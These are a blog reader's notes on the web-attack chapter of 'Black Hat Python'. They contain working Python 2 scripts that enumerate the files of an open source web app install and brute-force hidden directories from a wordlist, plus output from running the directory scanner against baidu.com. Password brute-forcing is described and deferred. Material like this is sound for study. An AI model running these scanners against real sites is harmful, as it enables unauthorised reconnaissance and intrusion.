Reading Notes: Black Hat Python (Part 4)

羊指甲

License: CC 4.0 BY-SA

Categories: python, networking

Article link: https://blog.youkuaiyun.com/zhijiayang/article/details/50689993

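This article looks at web attacks built on the Python library urllib2: requesting every file of a site that runs an open source framework, brute-forcing directory and file locations, and brute-forcing HTML form authentication.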

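Reading notes series

I am always reading: I read, forget, and read again. I might as well write down what I learn each time.

Chapter 5: Web Attacks

The Socket Library of the Web: urllib2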

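Star of chapter 2: Paramiko
Star of chapter 3: socket
Star of chapter 4: Scapy
Star of chapter 5: urllib2
This section takes a look at the urllib2 library.
urllib2 is a very useful HTTP client library. When making URL requests with it, you can set a proxy, a timeout, and headers, control redirects, handle cookies, use the HTTP PUT and DELETE methods, read the HTTP status code, submit form data, and more. It is a powerful library.
The author covers the basic usage in this section: fetching a web page with urllib2.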


import urllib2

url = 'http://www.baidu.com'

headers = {}
headers['User-Agent'] = 'Googlebot'

request = urllib2.Request(url, headers=headers)
response = urllib2.urlopen(request)

print response.geturl()
print response.read()
response.close()
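
To make a few of the features listed above concrete, here is a rough sketch of my own, not the book's code. It assumes Python 3, where urllib2 was split into urllib.request and urllib.error. The URL and the proxy address are placeholders I made up, and nothing is actually sent over the network.

```python
# Python 3 sketch (assumption: the book itself uses Python 2's urllib2).
import http.cookiejar
import urllib.request

# Hypothetical target; it is never contacted in this sketch.
url = "http://www.example.com/resource"

# A request with a custom header, a body, and an explicit HTTP method.
request = urllib.request.Request(
    url,
    data=b"payload",
    headers={"User-Agent": "Googlebot"},
    method="PUT",
)

# An opener that stores cookies and sends HTTP traffic through a proxy.
# The proxy address is a placeholder.
cookie_jar = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(
    urllib.request.ProxyHandler({"http": "http://127.0.0.1:8080"}),
    urllib.request.HTTPCookieProcessor(cookie_jar),
)

print(request.get_method())
print(request.get_header("User-agent"))  # header names are stored capitalized

# Sending would look like this (commented out so nothing touches the network):
# response = opener.open(request, timeout=5)
# print(response.getcode(), response.geturl())
```

The timeout is passed per call to open(), while proxy and cookie handling live in the opener, so one opener can be reused for many requests.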

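Mapping Open Source Web App Installations

The goal of this section is to request every file of a website that runs an open source framework.
Why target a site built on open source software?
The reason is simple: the attacker can set up the same framework locally and learn the layout of its files and directories, then request those same paths on the target site.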
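
The "learn the layout locally" step can be sketched on its own. This is my own Python 3 illustration, not the book's listing: collect_paths is a name I made up, and the temporary directory stands in for a local copy of the framework.

```python
import os
import tempfile


def collect_paths(root, filters):
    """Return site-relative paths for files under root, skipping filtered extensions."""
    paths = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() in filters:
                continue  # static assets are not interesting
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            paths.append("/" + rel.replace(os.sep, "/"))
    return sorted(paths)


# A tiny throwaway tree standing in for the local installation.
with tempfile.TemporaryDirectory() as root:
    os.makedirs(os.path.join(root, "admin"))
    for rel in ("index.php", "logo.png", os.path.join("admin", "login.php")):
        open(os.path.join(root, rel), "w").close()
    found = collect_paths(root, {".jpg", ".gif", ".png", ".css"})

print(found)
```

Each returned path can then be appended to the target's base URL to check whether the same file exists remotely.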

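The author stresses one thing about this section's code: it uses Queue. Most people who write multithreaded code use it because it is thread-safe. Here the Queue holds the URL paths to request; several threads are started, and each one pulls a path from the Queue and does the work.

As for open source frameworks, the author mentions Joomla, WordPress, and Drupal, but I wonder why Django and Ghost are left out. To try this section's code you need at least one of them installed. I have only installed Ghost and have not tested it yet.
The code is as follows: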

import Queue
import threading
import os
import urllib2

threads = 10

target = "http://www.test.com"
directory = "/Users/justin/Downloads/joomla-3.1.1"
filters = [".jpg", ".gif", ".png", ".css"]

os.chdir(directory)

web_paths = Queue.Queue()

for r, d, f in os.walk("."):
    for files in f:
        remote_path = "%s/%s" % (r, files)
        if remote_path.startswith("."):
            remote_path = remote_path[1:]
        if os.path.splitext(files)[1] not in filters:
            web_paths.put(remote_path)


def test_remote():
    while not web_paths.empty():
        path = web_paths.get()
        url = "%s%s" % (target, path)

        request = urllib2.Request(url)

        try:
            response = urllib2.urlopen(request)
            content = response.read()

            print "[%d] => %s" % (response.code, path)

            response.close()

        except urllib2.HTTPError as error:
            # print "Failed %s" % error.code
            pass


for i in range(threads):
    print "Spawning thread: %d" % i
    t = threading.Thread(target=test_remote)
    t.start()
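
One detail in the worker loop above: checking empty() and then calling get() are two separate steps, so another thread could take the last item in between and leave get() blocked. Below is a small variation of my own in Python 3, where the module is named queue. The check function is a placeholder for the real HTTP request, and the paths are made up.

```python
import queue
import threading


def check(path):
    """Placeholder for the HTTP request; here it only returns the path length."""
    return len(path)


def worker(todo, results, lock):
    while True:
        try:
            path = todo.get_nowait()  # never blocks, unlike empty() followed by get()
        except queue.Empty:
            return  # queue drained, this thread is done
        outcome = check(path)
        with lock:
            results.append((path, outcome))


todo = queue.Queue()
for p in ("/index.php", "/admin/", "/README.txt"):
    todo.put(p)

results = []
lock = threading.Lock()
pool = [threading.Thread(target=worker, args=(todo, results, lock)) for _ in range(4)]
for t in pool:
    t.start()
for t in pool:
    t.join()

print(sorted(results))
```

Joining the threads at the end is optional in the book's script, but it makes it obvious when the scan has finished.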

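Brute-Forcing Directories and File Locations

Brute forcing means that, knowing nothing about the target, you walk through a wordlist and try the entries one by one; there is plenty of time anyway.
Wordlists can be downloaded from open source projects. The author names two, DirBuster and SVNDigger, and also mentions Burp Suite, the web attack powerhouse covered in the next chapter.
https://www.netsparker.com/blog/web-security/svn-digger-better-lists-for-forced-browsing/
https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
In this section the author uses the SVNDigger wordlist to brute-force scan the target site; download all.txt from the link above to use as the wordlist.
I tried this code with the target changed to baidu: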

import urllib2
import urllib
import threading
import Queue

threads = 5
target_url = "http://www.baidu.com"
wordlist_file = "all.txt"  # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"


def build_wordlist(wordlist_file):
    # read in the word list
    fd = open(wordlist_file, "rb")
    raw_words = fd.readlines()
    fd.close()

    found_resume = False
    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print "Resuming wordlist from: %s" % resume

        else:
            words.put(word)

    return words


def dir_bruter(extensions=None):
    while not word_queue.empty():
        attempt = word_queue.get()

        attempt_list = []

        # check if there is a file extension if not
        # it's a directory path we're bruting
        if "." not in attempt:
            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)

        # if we want to bruteforce extensions
        if extensions:
            for extension in extensions:
                attempt_list.append("/%s%s" % (attempt, extension))

        # iterate over our list of attempts        
        for brute in attempt_list:

            url = "%s%s" % (target_url, urllib.quote(brute))

            try:
                headers = {}
                headers["User-Agent"] = user_agent
                r = urllib2.Request(url, headers=headers)

                response = urllib2.urlopen(r)

                if len(response.read()):
                    print "[%d] => %s" % (response.code, url)

            except urllib2.HTTPError as e:

                if e.code != 404:
                    print "!!! %d => %s" % (e.code, url)


word_queue = build_wordlist(wordlist_file)
extensions = [".php", ".bak", ".orig", ".inc"]

for i in range(threads):
    t = threading.Thread(target=dir_bruter, args=(extensions,))
    t.start()
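
The two pieces of logic in the listing above, resuming from a given word and expanding one word into several candidate paths, are easier to follow in isolation. This is my own Python 3 restatement, not the book's code: load_words and build_attempts are names I chose, and unlike the listing, load_words skips blank lines.

```python
def load_words(lines, resume=None):
    """Strip each line; if resume is set, keep only the words that come after it."""
    words = [line.strip() for line in lines if line.strip()]
    if resume is None:
        return words
    if resume in words:
        return words[words.index(resume) + 1:]
    return []  # resume word never seen: nothing is queued, as in the listing


def build_attempts(word, extensions=None):
    """Expand one wordlist entry into the paths the scanner will request."""
    attempts = []
    if "." not in word:
        attempts.append("/%s/" % word)  # no extension: treat it as a directory
    else:
        attempts.append("/%s" % word)   # has an extension: treat it as a file
    for ext in extensions or []:
        attempts.append("/%s%s" % (word, ext))
    return attempts


print(load_words(["CVS\n", "root\n", "common\n"], resume="root"))
print(build_attempts("admin", [".php", ".bak"]))
print(build_attempts("robots.txt"))
```

With four extensions, every word in the list turns into five requests, so the extension list has a large effect on how long a scan takes.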

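The result: every single URL came back as found. It turns out that for a nonexistent URL baidu does not return a 4xx but a 3xx redirect. urllib2 follows the redirect automatically and downloads the page it points to, which is baidu's error page. To the code this looks just like a normal page, so the reported status code is 200. The attack code therefore needs a small change: check whether the URL of the response is the same as the URL we requested. Fortunately urllib2 supports this. Adding one check to the original code is enough: if response.geturl() == url: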


[200] => http://www.baidu.com/root/
[200] => http://www.baidu.com/CVS/
[200] => http://www.baidu.com/common/
[200] => http://www.baidu.com/Entries/
[200] => http://www.baidu.com/lang/
[200] => http://www.baidu.com/root.php
[200] => http://www.baidu.com/Entries.php

$ curl http://www.baidu.com/root/ -i
HTTP/1.1 302 Found
Via: 1.1 TMG3
Connection: Keep-Alive
Proxy-Connection: Keep-Alive
Content-Length: 222
Expires: Sat, 20 Feb 2016 02:33:59 GMT
Date: Fri, 19 Feb 2016 02:33:59 GMT
Location: http://www.baidu.com/search/error.html
Content-Type: text/html; charset=iso-8859-1
Server: Apache
Cache-Control: max-age=86400

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.baidu.com/search/error.html">here</a>.</p>
</body></html>
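
Here is a rough Python 3 sketch of two ways to deal with this kind of redirect. It is my own illustration, not from the book. is_genuine_hit wraps the geturl() comparison described above. NoRedirectHandler is an alternative that, as far as I understand the library, makes a 3xx surface as an HTTPError instead of being followed. Both names are mine, and FakeResponse exists only so the sketch runs without network access.

```python
import urllib.request


class NoRedirectHandler(urllib.request.HTTPRedirectHandler):
    """Decline every redirect, so the opener reports the 3xx as an HTTPError."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def is_genuine_hit(response, requested_url):
    """True only when the final URL is the one we asked for (no redirect happened)."""
    return response.geturl() == requested_url


class FakeResponse:
    """Stand-in for a urlopen() result, used only for this offline demo."""

    def __init__(self, final_url):
        self._final_url = final_url

    def geturl(self):
        return self._final_url


requested = "http://www.baidu.com/root/"
redirected = FakeResponse("http://www.baidu.com/search/error.html")
direct = FakeResponse(requested)

print(is_genuine_hit(redirected, requested))
print(is_genuine_hit(direct, requested))

# An opener that would not follow redirects (built here, but not used to send anything).
opener = urllib.request.build_opener(NoRedirectHandler())
```

The geturl() comparison is the smaller change to the original script; the handler approach also saves the extra request for the error page.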

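Brute-Forcing HTML Form Authentication

In this section the author analyzes the HTML of Joomla's login page and then brute-forces it with urllib2 and HTMLParser. I have not downloaded the wordlist yet and have not installed Joomla either, so I will try this code later.
The wordlist is available from http://www.oxid.it/cain.html; I will download it when my network connection is better.
Joomla looks pretty good; I will try it when I get home.
I have no way around the firewall right now, so I first downloaded a cracked portable package (http://www.wmzhe.com/soft-18663.html) and found a wordlist.txt file inside it, which is probably the one.
Leaving a # TODO here.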
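
As a starting point for that TODO, here is a minimal Python 3 sketch of the form-parsing half of the idea: collect the input fields of a login form, fill in a guess, and encode the result as a POST body. It is not the book's code. The HTML sample, the field names, and the credentials are all made up and are not real Joomla markup. In Python 3 the parser lives in html.parser.

```python
import urllib.parse
from html.parser import HTMLParser


class InputCollector(HTMLParser):
    """Collect name/value pairs from every named <input> tag."""

    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        attributes = dict(attrs)
        name = attributes.get("name")
        if name is not None:
            self.fields[name] = attributes.get("value") or ""


# Hypothetical login form; a real page would be fetched from the target.
sample = """
<form action="/administrator/index.php" method="post">
  <input name="username" type="text">
  <input name="passwd" type="password">
  <input type="hidden" name="token123" value="1">
  <input type="submit" value="Log in">
</form>
"""

parser = InputCollector()
parser.feed(sample)

fields = parser.fields
fields["username"] = "admin"   # placeholder account name
fields["passwd"] = "guess"     # one candidate from the wordlist

body = urllib.parse.urlencode(fields).encode()
print(body)
```

Hidden fields such as the token are kept as they are, which matters when the login form carries a per-session value that has to be posted back together with the credentials.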